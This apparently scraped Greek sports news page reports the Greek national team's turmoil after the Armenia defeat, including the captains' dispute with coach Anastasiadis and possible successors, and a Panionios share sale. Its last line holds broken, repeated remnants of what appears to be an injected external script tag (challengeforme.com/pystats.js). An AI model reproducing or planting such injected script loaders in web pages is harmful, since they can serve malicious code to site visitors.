Εθνική Ελλάδας: Αυτά ειπώθηκαν μεταξύ ΕΠΟ και αρχηγών * Φαβορί ο Ουζουνίδης για Εθνική, εναλλακτικό πλάνο με Δέλλα και ομάδα του 2004 * Πανιώνιος: Δάρας και Ζαμάνης μεταβιβάζουν μέρος των μετοχών τους

Ο Βαγγέλης Γραμμένος τα είπε με τους αρχηγούς της Εθνικής μετά τον αγώνα με την Αρμενία και τους ζήτησε να κάνουν υπομονή και να μην ληφθούν αποφάσεις εν θερμώ για το καλό της γαλανόλευκης. Ποια ήταν η στάση των αρχηγών.

Η κατάσταση στην Εθνική ομάδα είναι πιο οριακή από ποτέ μετά το νέο αρνητικό αποτέλεσμα με την Αρμενία, που σε μεγάλο βαθμό περιορίζει τις ελπίδες πρόκρισης στα τελικά του Euro 2020. Ο Σωκράτης Παπασταθόπουλος μετά τον αγώνα έκανε δηλώσεις, οι οποίες δεν έμειναν αναπάντητες τόσο από τον ομοσπονδιακό τεχνικό, Άγγελο Αναστασιαδη, όσο και από τον Άγγελο Μπασινά, ρίχνοντας περισσότερο λάδι στη φωτιά.

Το κλίμα είναι δεδομένα βαρύ για τον προπονητή, το μέλλον του τίθεται εν αμφιβόλω, όμως δεν πρόκειται να ληφθούν αποφάσεις εν βρασμώ από τον Βαγγέλη Γραμμένο. Αυτό είναι και το κλίμα που προκύπτει από τη συνάντησή του με τους αρχηγούς της Εθνικής, Σωκράτη Παπασταθόπουλο και Κώστα Μανωλά, με τον πρόεδρο της ΕΠΟ να τους ζητά να κάνουν υπομονή για το καλό της Εθνικής και να μην πυροδοτήσουν περισσότερο την κατάσταση.

Οι διεθνείς συμφώνησαν και ουδέποτε έθεσαν το δίλημμα “εμείς ή αυτός”, ούτε του έβαλαν τη θηλιά στο λαιμό, αντιλαμβανόμενοι ότι προέχει η ηρεμία στην ομάδα. Προφανώς κανείς δεν μπορεί να παραγνωρίσει τα προβλήματα που υπάρχουν και την κατάσταση που έγινε ακόμα πιο βαριά από τα αρνητικά αποτελέσματα με Ιταλία και Αρμενία στο ΟΑΚΑ.

Οι παίκτες έχουν ανοικτά θέματα με τον προπονητή, ο Βαγγέλης Γραμμένος τα γνωρίζει, όμως από τη μεριά του θέλησε να κατευνάσει τα πνεύματα και να μην προβεί σε βιαστικές αποφάσεις, που ίσως είχαν το αντίθετο από το προσδοκώμενο αποτέλεσμα για το μέλλον του αντιπροσωπευτικού συγκροτήματος.

Τις επόμενες ημέρες θα υπάρξουν διεργασίες και συζητήσεις, θα τεθούν όλα τα θέματα επί τάπητος, θα πέσουν ονόματα στο τραπέζι (ήδη ακούγονται οι Ουζουνίδης και Δέλλας), αν παρθεί η απόφαση να μην συνεχιστεί η συνεργασία με τον Άγγελο Αναστασιάδη, για τον οποίον υπάρχουν πολλές φωνές στην Ομοσπονδία για άμεση απομάκρυνσή του.

Εν κατακλείδι, ο Βαγγέλης Γραμμένος συζήτησε με τους διεθνείς, άκουσε όσα είχαν να του πουν, ο ίδιος τους είπε τη δική του άποψη για την κατάσταση και τους ζήτησε να κάνουν λίγη υπομονή και να προετοιμαστεί η επόμενη μέρα για την Εθνική ομάδα. Όσο για τον προπονητή και τους παίκτες, βρίσκονται στους τόπους καταγωγής τους για τις διακοπές τους.

 

Φαβορί ο Ουζουνίδης για Εθνική, εναλλακτικό πλάνο με Δέλλα και ομάδα του 2004

Γίναμε επισήμως μπάχαλο. Η Εθνική μετά το παιχνίδι με την Αρμενία, μετά τη νέα ταπεινωτική ήττα έγινε Big Brother. Η εικόνα του Παπασταθόπουλου, η δύσκολη θέση του Μπασινά και η επόμενη μέρα με Ουζουνίδη ή Δέλλα. Ο Τσάρλυ αναλύει.

Η Ελλάδα εμφάνισε για ακόμη μια φορά τις γνωστές παθογένειες και εκτός συγκλονιστικού απροόπτου θα υπάρξουν αλλαγές τις επόμενες ημέρες. Αλλαγές που αφορούν στον πάγκο της ομάδας, καθώς όλη αυτή η κατάσταση δεν μπορεί να συνεχιστεί.

Ουσιαστικά οι παίκτες έχουν θέσει βέτο. Ήδη έχει πέσει στο τραπέζι το όνομα του Μαρίνου Ουζουνίδη, ενώ υπάρχει και εναλλακτικό σχέδιο. Ο Άγγελος Αναστασιάδης βρίσκεται από το πρωί στη Θεσσαλονίκη και ο πρόεδρος της ΕΠΟ δέχεται από χθες το βράδυ (11/6) πιέσεις για την αντικατάστασή του.

Η Εθνική μας μετά το παιχνίδι με την Αρμενία, μετά τη νέα ταπεινωτική ήττα, χωρίστηκε σε στρατόπεδα και έγινε Big Brother. Οι πρωταγωνιστές αποφάσισαν να τα βγάλουν όλα στις κάμερες, χωρίς να μιλήσουν πρώτα μεταξύ τους, δίχως να λύσουν τις διαφορές τους στα αποδυτήρια, ξεγυμνώθηκαν στις κάμερες. Είναι από τις λίγες φορές που δεν χρειάζεται να κάνει κανείς ρεπορτάζ, τα πάντα βγήκαν προς τα έξω.

Ο αρχηγός της Εθνικής, Σωκράτης Παπασταθόπουλος, ανέλαβε την ευθύνη και ταυτόχρονα ζήτησε να αλλάξει ο προπονητής. Και το έκανε σε LIVE μετάδοση! Ο τεχνικός της Εθνικής ομάδας. στην συνέντευξη τύπου, την ώρα που προσπαθούσε να πει αυτά που πίστευε πως ήθελαν να ακούσουν οι παίκτες του, με μοναδικό στόχο να παραμείνει στην θέση του μέχρι το τέλος των προκριματικών και όχι να αποτυπώσει την πραγματική εικόνα του αγώνα, πληροφορήθηκε από έναν δημοσιογράφο όσα δήλωσε ο Παπασταθόπουλος.

Αντί να εκμεταλλευτεί ως όφειλε για την θέση που έχει αναλάβει, το γεγονός πως δεν είχε ακούσει ο ίδιος τις δηλώσεις και να ξεγλιστρήσει, λεγοντας πως πρέπει να τις δει ο ίδιος και να μιλήσει με τον παίκτη του, πήγε σε απευθείας αντιπαράθεση και ο αρχηγός της Εθνικής έγινε “κύριος Παπασταθόπουλος”. Στη συνέχεια, ο τεχνικός διευθυντής της Εθνικής ομάδας είπε πως δεν θα ακούσουμε τους ποδοσφαιριστές, που δεν έχουν κάνει το παραμικρό τα τελευταία 4 χρόνια.

Η βραδιά συνεχίστηκε με τους Μανωλά, Παπασταθόπουλο να πηγαίνουν στον Γραμμένο, παρουσία και άλλων συμβούλων της ΕΠΟ και να λένε πως αν δεν προχωρήσουμε σε αλλαγή προπονητή, θα αποχωρήσουν από την Εθνική και την επόμενη ημέρα το πρωί ο αναπληρωτής πρόεδρος της ΕΠΟ ζήτησε συγγνώμη γιατί την επιλογή Αναστασιάδη. Μιλάμε για το απόλυτο μπάχαλο.

ΔΕΝ ΗΤΑΝ ΕΙΚΟΝΑ ΑΡΧΗΓΟΥ

Όλες οι πλευρές έχουν τεράστιες ευθύνες για αυτό το χάλι και ακόμα κι ο τρόπος που λειτουργούν μετά το παιχνίδι δείχνει την ανεπάρκεια τους. Δεν ήταν εικόνα αρχηγού αυτή που είδαμε στο τέλος του παιχνιδιού, δεν γίνεται να έχεις αυτήν την άθλια αγωνιστική εικόνα και να βάλεις εκβιαστικό δίλλημα μπροστά στις κάμερες. Δεν λέω πως δεν έχει δίκιο, ο προπονητής έχει τεράστιες ευθύνες, όμως με αυτόν τον τρόπο τους φέρνεις όλους σε δύσκολη θέση και κάνεις την κατάσταση πιο δύσκολη.

Η ΔΥΣΚΟΛΗ ΘΕΣΗ ΤΟΥ ΜΠΑΣΙΝΑ

Δεν γίνεται όποιος και να είναι ο προπονητής, να φαίνεται πως δύο παίκτες αποφασίζουν αν θα μένει η θα φεύγει από την Εθνική ομάδα και γι’ αυτόν τον λόγο είχε απόλυτο δίκιο ο Μπασινάς. Ήταν ο μόνος που, βάσει της θέσης που είχε, στάθηκε σωστά. Το κακό όμως είναι πως ο προπονητής τα θαλάσσωσε, λειτούργησε με έναν τρόπο που δεν γίνεται να στηριχθεί.

ΧΑΟΣ

Δεν μπορείς να πάρεις στα σοβαρά έναν προπονητή, που σε κάθε παιχνίδια αλλάζει τερματοφύλακα. Δεν χρειάζεται κάτι άλλο. Στο φιλικό στην Κωνσταντινούπολη παίξαμε χωρίς στοπερ, χάναμε από νωρίς με 2-0, ο Πασχαλάκης μάς κράτησε. Ψάχνεις όπως λες για ρέντα και έχεις έναν τερματοφύλακα γεμάτο αυτοπεποίθηση, με εκπληκτικά προσόντα, που του πάνε όλα καλά και είναι γεμάτος ρέντα. Τον είδες να αντέχει στην πίεση, δεν γίνεται να μην πηγαίνεις μαζί του και να βάζεις με την Ιταλία τον Μπάρκα που είχε μέτρια χρονιά και ήταν τρίτη επιλογή.

Όμως αυτή η απόφαση το Σάββατο βγήκε ο Μπάρκας, έπαιξε καλά, όλοι περιμένουν να ξεκινήσει τον Μπάρκα και τελικά πάει με τον Βλαχοδήμο. Η απάντηση του πως έχει τρείς ισάξιους τερματοφύλακες, λυπάμαι που το λέω, αλλά στερείται σοβαρότητας. Οι περισσότεροι ομοσπονδιακοί έχουν τρεις καλούς τερματοφύλακες, έχουν την υποχρέωση όμως να επιλέξουν και να δείξουν ποιος είναι ο βασικός, το χάος με την επιλογή του τερματοφύλακα, είναι μία μικρογραφία της χαοτικής κατάστασης που δημιούργησε στην Εθνική.

Η επιλογή Αναστασιάδη, δεδομένα δεν βγήκε, το συμβόλαιό του τελειώνει τον Νοέμβριο, όμως με τις συνθήκες που έχουν δημιουργηθεί, δεν γίνεται να παραμείνει. Ο ίδιος με τις επιλογές του, έχασε την εμπιστοσύνη των παικτών, των ανθρώπων που τον επέλεξαν, ακόμα και των συνεργατών του, που ψάχνουν τρόπο να διαχωρίσουν την θέση τους, αλλά ο τρόπος που λειτούργησε ο Παπασταθόπουλος, τους το έκανε δύσκολο.

ΟΥΖΟΥΝΙΔΗΣ Ή ΔΕΛΛΑΣ

Πριν το παιχνίδι με την Αρμενία, κυκλοφορούσε το όνομα του Μανόλο Χιμένεθ. Από σήμερα προκρίνεται το όνομα του Μαρίνου Ουζουνίδη. Ο Ουζουνίδης μάλιστα ήταν ο πρώτος προπονητής που είχε στο μυαλό του ο πρόεδρος της ΕΠΟ και είχε κάνει μία αρχική κουβέντα μαζί του, τον Νοέμβριο του 2017, όταν ακόμα ήταν προπονητής στον Παναθηναϊκό.

Υπάρχουν βέβαια και αυτοί που υποστηρίζουν πως η Εθνική πρέπει να πάει αποκλειστικά στην ομάδα του 2004 και προτείνουν μία λύση με Δέλλα προπονητή, πλαισιωμένο από Γιανακόπουλο, Μπασινά και θα γίνει μία προσπάθεια για ενεργοποίηση και άλλων παικτών από το 2004.

 

Πανιώνιος: Δάρας και Ζαμάνης μεταβιβάζουν μέρος των μετοχών τους

Σύμφωνα με πληροφορίες  οι Χρήστος Δάρας και Νίκος Ζαμάνης στον Πανιώνιο είναι σε συζητήσει με ομογενή επιχειρηματία για την πώληση μέρος των μετοχών τους.

Σε συζητήσεις για την παραχώρηση μέρος των μετοχών που κατέχουν στον Πανιώνιο είναι ο πρόεδρος της ομάδας Χρήστος Δάρας και ο Νίκος Ζαμάνης σύμφωνα με πληροφορίες.

Το ρεπορτάζ αναφέρει πως οι δυο προαναφερόμενοι έχουν ξεκινήσει κύκλο επαφών με ομογενή επιχειρηματία ο οποίος έχει την έδρα των επιχειρήσεων του στο στο εξωτερικό προκειμένου να πουλήσουν μέρος των μετοχών τους και ουσιαστικά να γίνει “συμπαίκτης” τους στην “κυανέρυθρη” ΠΑΕ.

Αν προχωρήσει η συγκεκριμένη περίπτωση τότε ο Πανιώνιος που φέτος δεν πήρε άδεια μεταγραφών λόγω των οικονομικών εκκρεμοτήτων που έχει θα μπορέσει να κοιτάξει με μεγαλύτερη αισιοδοξία το μέλλον.

Μην ξεχνάμε άλλωστε ότι φέτος λόγω των περιορισμών στις μεταγραφές η ομάδα της Νέας Σμύρνης έχει δικαίωμα για μεταγραφές μόνο νεαρών ποδοσφαιριστών έχοντας ήδη ανακοινώσει τους Παπανικολάου και Λυμπεράκη.

challengeforme.com/pystats.js’ async=true >challengeforme.com/pystats.js’ async=true >‘ >‘ >‘ >‘ >‘ >‘ >‘ >‘ >